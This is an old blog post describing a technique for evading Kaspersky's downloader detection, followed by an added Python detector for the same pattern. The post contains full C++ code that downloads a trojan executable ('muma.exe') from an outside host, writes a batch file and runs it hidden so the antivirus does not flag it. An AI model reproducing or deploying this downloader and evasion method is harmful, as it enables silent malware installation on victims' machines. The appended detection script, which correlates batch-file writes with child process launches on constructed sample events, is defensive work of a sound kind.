• An idea for getting past Kaspersky

    post by Holmesian / 2008-9-22 23:13 Monday
    Kaspersky's detection logic is: the file downloads tol.exe -> the file runs tol.exe (flagged as a downloader)

    New approach: the file downloads tol.exe -> writes chage.bat -> runs chage.bat (not flagged as a downloader)


    [quote]
    #include "stdafx.h"
    #include <iostream.h>
    #include <fstream.h>
    #include <UrlMon.h>
    #include <string.h>
    #include <windows.h>
    #pragma comment(lib, "urlmon.lib")

    int APIENTRY WinMain(HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPSTR    lpCmdLine,
                        int      nCmdShow)
    { char muma[]="http://www.Holmesian.cn/muma.exe";
      // TODO: Place code here.
    while(true){
    HRESULT hr = URLDownloadToFile(0, muma,"C:\\ma11.exe", 0,NULL);
    if (hr== S_OK)
    {  const char filename[] = "c:\\vir11.bat";
      ofstream o_file;
      o_file.open(filename);
      o_file <<"echo off"<<endl;
      o_file <<"C:\\ma11.exe"<<endl;
      o_file.close();
      WinExec("C:\\vir11.bat",0);
    return 0;
    Sleep(10000);
    }
    }
    return 0;
    }[/quote]
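A defender-side check for the pattern the post describes, as an added example that is not part of the original post: it scans constructed Sysmon-style events for a process that writes a .bat file and then, within a short window, spawns a child whose command line runs that same file. The event field names and the sample values are assumptions, not real logs.

```python
from datetime import datetime, timedelta

# Constructed sample events in a Sysmon-like shape (not real logs).
# pid 1234 fetches an .exe, writes a .bat and launches it via cmd.exe;
# pid 2000 writes a .bat but never runs it (benign control case).
EVENTS = [
    {"t": "2008-09-22T23:13:00", "type": "FileCreate", "pid": 1234,
     "image": r"C:\Users\u\dl.exe", "target": r"C:\ma11.exe"},
    {"t": "2008-09-22T23:13:01", "type": "FileCreate", "pid": 1234,
     "image": r"C:\Users\u\dl.exe", "target": r"c:\vir11.bat"},
    {"t": "2008-09-22T23:13:02", "type": "ProcessCreate", "pid": 1300, "ppid": 1234,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd /c "C:\vir11.bat"'},
    {"t": "2008-09-22T23:20:00", "type": "FileCreate", "pid": 2000,
     "image": r"C:\Windows\notepad.exe", "target": r"C:\notes\todo.bat"},
]


def find_dropped_batch_launches(events, window_seconds=30):
    """Return (writer_image, bat_path, child_cmdline) for every .bat file that a
    process wrote and then ran through a child process within window_seconds."""
    writes = {}  # (writer pid, normalised bat path) -> (write time, writer image)
    hits = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        ts = datetime.fromisoformat(e["t"])
        if e["type"] == "FileCreate" and e["target"].lower().endswith(".bat"):
            # Normalise case: the dropper may write "c:\..." and run "C:\...".
            writes[(e["pid"], e["target"].lower())] = (ts, e["image"])
        elif e["type"] == "ProcessCreate":
            cmd = e.get("cmdline", "").lower()
            for (wpid, bat), (wts, wimg) in writes.items():
                same_parent = wpid == e.get("ppid")
                recent = ts - wts <= timedelta(seconds=window_seconds)
                if same_parent and bat in cmd and recent:
                    hits.append((wimg, bat, e["cmdline"]))
    return hits


if __name__ == "__main__":
    for writer, bat, cmd in find_dropped_batch_launches(EVENTS):
        print(f"dropped batch launched: {writer} wrote {bat}, then ran: {cmd}")
```

The correlation key is the parent/child relationship plus the file path, so a user saving and running a script by hand later, or a different process running the file, does not match.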
